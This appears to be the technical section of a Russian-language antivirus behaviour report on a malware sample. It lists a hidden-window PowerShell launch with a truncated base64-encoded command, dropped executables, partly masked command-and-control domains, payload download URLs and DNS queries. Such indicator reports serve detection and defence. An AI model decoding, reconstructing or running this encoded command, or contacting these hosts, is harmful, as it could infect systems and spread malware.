Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYATABJAEIAbQBpAG0APQAnAEEAWABVAEwAUgBwAHIAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAFIAaQBUAHkAUABgAFIATwB0AG8AYABjAGAATwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1976
- %TEMP%\935974.cvr
- %HOMEPATH%\530.exe
- %HOMEPATH%\530.exe
- 'ro####ntheos.com':80
- 'sw####ommerce.com':80
- 'ji##isp.com':443
- 'le##r.xyz':80
- 'cr####elopments.com':443
- http://sw####ommerce.com/wp-content/uploads/ttf_mn_e30rtucds7/
- http://le##r.xyz/wp-content/yzv_l_mbqzuo8md9/
- DNS ASK ro####ntheos.com
- DNS ASK sw####ommerce.com
- DNS ASK ji##isp.com
- DNS ASK le##r.xyz
- DNS ASK cr####elopments.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYATABJAEIAbQBpAG0APQAnAEEAWABVAEwAUgBwAHIAagAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAFIAaQBUAHkAUABgAFIATwB0AG8AYABjAGAATwBMACIAIAA9AC...' (со скрытым окном)